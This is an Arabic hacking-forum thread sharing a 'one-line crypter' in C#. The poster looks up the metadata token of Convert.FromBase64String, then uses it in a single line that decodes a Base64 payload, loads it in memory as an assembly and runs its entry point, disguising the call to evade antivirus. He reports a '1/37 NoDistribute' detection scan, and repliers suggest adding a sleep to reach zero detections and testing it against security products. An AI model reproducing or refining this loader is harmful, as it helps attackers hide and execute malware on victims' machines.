نشفيرة سطر واحد [Metadata] استداع الميثودس عن طريق

تم تحميل الصفحة في 1,7261372 ثانية
نشفيرة سطر واحد [Metadata] استداع الميثودس عن طريق
إنضم
4 نوفمبر 2013
المشاركات
75
الإعجابات
112
النقاط
33
العمر
19
الإقامة
لــــيــــبــــيــــا
السلام عليكم ورحمة الله


فكرة بسيطة لاستدعاء الميثودس عن طريق الMetadataToken

اولا نقوم بجلب الميتا داتا
مثال


C#:
foreach (var C in typeof(System.Convert).GetMethods())
            {
                if (C.Name == "FromBase64String")
                {
                    Console.Write(C.MetadataToken);
                }
            }
والان حصلنا بعد تحصلنا عليه:)



C#:
   AppDomain.CurrentDomain.Load(typeof(Convert).Module.ResolveMethod(100665655).Invoke(Type.EmptyTypes, new object[] { "Base64" }) as byte[]).EntryPoint.Invoke(Type.EmptyTypes, Type.EmptyTypes);

النتيجة [1/37]
NewStep.exe | 1/37 | NoDistribute

مع ان قيم البيس 64 ظاهرة تصرخ أنا هنا ههههههههه

:)

احب اهداء الموضوع الى
المتابع لجميع المواضيع واخر المستجدات


grahham

بس ياريت يحط اعجبات ايضا ههههههه
 
التعديل الأخير:
إنضم
26 أكتوبر 2012
المشاركات
3,071
الإعجابات
3,058
النقاط
113
الإقامة
أˆأ،أڈ أ‡أ،أ£أ،أأ¦أ¤ أ¦أ¤أ•أ‌ أ‡أ،أ£أ،أأ¦أ¤ أ”أ¥
سلمت أخي الكريم صراحة بلاقيك منشط القسم هالأيام لا تحرمنا من مواضيعك الحلوة
همسة :
نتيجة قوية
♥ ♥
 

Mssuy

Beginner Developer
rank
إنضم
7 سبتمبر 2017
المشاركات
21
الإعجابات
12
النقاط
3
العمر
24
شكراً أخي على هدا الموضوع الجميل، واجهتني مشكلة مع Propereties.setting لم أجد لها reference

 
إنضم
4 نوفمبر 2013
المشاركات
75
الإعجابات
112
النقاط
33
العمر
19
الإقامة
لــــيــــبــــيــــا
شكراً أخي على هدا الموضوع الجميل، واجهتني مشكلة مع Propereties.setting لم أجد لها reference

هدا ليس ريفرنس هدا حقل موجود في السيتنق
ادخل للبروبرتز واختار سيتنقس
 
الإعجابات: Mssuy
إنضم
27 أكتوبر 2009
المشاركات
361
الإعجابات
238
النقاط
63
موضوع جميل ونتيجة قويه
لكن لو أضفت سليب السطر اظن النتيجه كلين
لم اجرب بعد
انت سبقتني بسطر

طرحت وأبدعت

إن شاء الله لي تجربه على بعض الحمايات ونشوف الفضايح :)
أن شاء الله نتائج مرضيه
تحياتي ياباشا
 
إنضم
4 نوفمبر 2013
المشاركات
75
الإعجابات
112
النقاط
33
العمر
19
الإقامة
لــــيــــبــــيــــا
موضوع جميل ونتيجة قويه
لكن لو أضفت سليب السطر اظن النتيجه كلين
لم اجرب بعد
انت سبقتني بسطر

طرحت وأبدعت

إن شاء الله لي تجربه على بعض الحمايات ونشوف الفضايح :)
أن شاء الله نتائج مرضيه
تحياتي ياباشا
تسلم أخي كات مان :32::32::32:
نعم نعم السليب ضروري منه :10::10:
بس انا كتبت في العنوان سطر واحد ههههههه لهدا ما اضفت شيء:(172)[1]:
الفكرة كلها عبارة عن تمويه فقط لدالة FromBase64String

ننتضر النتيجة من عندك أخي :zxcv29:
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل